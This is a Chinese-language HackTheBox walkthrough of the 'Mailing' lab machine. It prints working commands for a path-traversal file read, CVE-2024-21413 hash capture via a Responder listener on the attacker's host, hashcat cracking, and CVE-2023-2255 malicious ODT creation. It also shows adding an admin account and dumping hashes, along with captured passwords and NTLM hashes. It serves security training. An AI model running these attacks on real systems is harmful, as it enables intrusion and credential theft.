Mailing - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Mailing
• 10.10.11.14

端口扫描

80和一些邮件服务相关端口：

$ nmap -sC -sV 10.10.11.14
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-06 13:30 CST
Nmap scan report for 10.10.11.14
Host is up (0.10s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp open  pop3          hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp open  imap          hMailServer imapd
|_imap-capabilities: ACL IMAP4rev1 CHILDREN OK CAPABILITY completed IDLE RIGHTS=texkA0001 IMAP4 QUOTA SORT NAMESPACE
445/tcp open  microsoft-ds?
465/tcp open  ssl/smtp      hMailServer smtpd
|_smtp-commands: Couldn't establish connection on port 465
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp          hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
993/tcp open  ssl/imap      hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -4m49s
| smb2-time:
|   date: 2024-05-06T05:27:37
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.19 seconds

80

需要加hosts：

10.10.11.14 mailing.htb

一个邮件服务相关的，用的hMailServer页面底部提供了介绍pdf下载，pdf中可以得到用到的一些客户端信息以及maya的邮件地址：

maya@mailing.htb

LFI

文件下载那里很基础的LFI：

hMailServer.ini

前面可以看到使用了hMailServer，根据文档读取配置文件，区别就是文档里是Program Files，实际安装目录是Program Files (x86)：

• Ini-file settings - hMailServer - Free open source email server for Microsoft Windows
  https://www.hmailserver.com/documentation/v5.4/?page=reference_inifilesettings
• Change the data directory - hMailServer - Free open source email server for Microsoft Windows
  https://www.hmailserver.com/documentation/v4.3/?page=howto_change_data_directory

http://mailing.htb/download.php?file=..\..\Program+Files+(x86)\hMailServer\bin\hMailServer.ini

AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7

# cmd5有记录
homenetworkingadministrator

CVE-2024-21413

得到的账号密码可以发送邮件，根据前面pdf中得到的客户端信息，就是发邮件给maya利用最新的漏洞获取maya NetNTLM hash，破解出密码：

• xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-Vulnerability
  https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

sudo python3 Responder.py -i 10.10.14.6 -v

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username "Administrator@mailing.htb" --password "homenetworkingadministrator" --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.6\miao\miao' --subject "miao"

[SMB] NTLMv2-SSP Hash     : maya::MAILING:1122334455667788:09DBC2C5CE524F034F1946E776A1056C:010100000000000080529112BD9FDA01ED781EC555C1C8400000000002000800300030003500360001001E00570049004E002D0041004400520046003000330035004C00410044004E0004003400570049004E002D0041004400520046003000330035004C00410044004E002E0030003000350036002E004C004F00430041004C000300140030003000350036002E004C004F00430041004C000500140030003000350036002E004C004F00430041004C000700080080529112BD9FDA010600040002000000080030003000000000000000000000000020000036032A70F7AE1C7EBB195568D2B6F4836111F2DB075AF0CD6A64614AB63A7E300A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000

sudo hashcat -m 5600 hash.txt ~/Tools/dict/rockyou.txt

m4y4ngs4ri

user flag

使用得到的maya账号密码登录：

evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri

提权信息

常规枚举发现定时执行的计划任务,对应文件我们没有读权限，但LibreOffice目录中也可以看到同名的ps1文件：

schtasks /query /v /fo LIST /tn "Test"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Users\localadmin\Documents\scripts\soffice.ps1

查看文件内容可以知道是会打开指定目录下的odt文件，但计划任务使用的不是public目录，简单枚举可以发现C盘根目录的Important Documents：

所以就是制作一个恶意odt文件上传，等待触发执行

提权 & root flag

Important Documents目录有自动清理,并且有杀软,所以执行一些简单的命令例如添加管理员用户

另外根据libreoffice版本可以使用这个来制作odt文件

• elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre Office
  https://github.com/elweth-sec/CVE-2023-2255

python3 CVE-2023-2255.py --cmd 'net user miao 123456 /add' --output '../exploit.odt'
# 又是一台非英语机器
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores miao /add' --output '../exploit.odt'

upload exploit.odt

然后就可以用我们添加的管理员账号dump hash，读取root flag：

hashdump

./bin/python3 ./examples/secretsdump.py miao:123456@10.10.11.14

Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::

参考资料

• Ini-file settings - hMailServer - Free open source email server for Microsoft Windows
  https://www.hmailserver.com/documentation/v5.4/?page=reference_inifilesettings
• Change the data directory - hMailServer - Free open source email server for Microsoft Windows
  https://www.hmailserver.com/documentation/v4.3/?page=howto_change_data_directory
• xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-Vulnerability
  https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
• elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre Office
  https://github.com/elweth-sec/CVE-2023-2255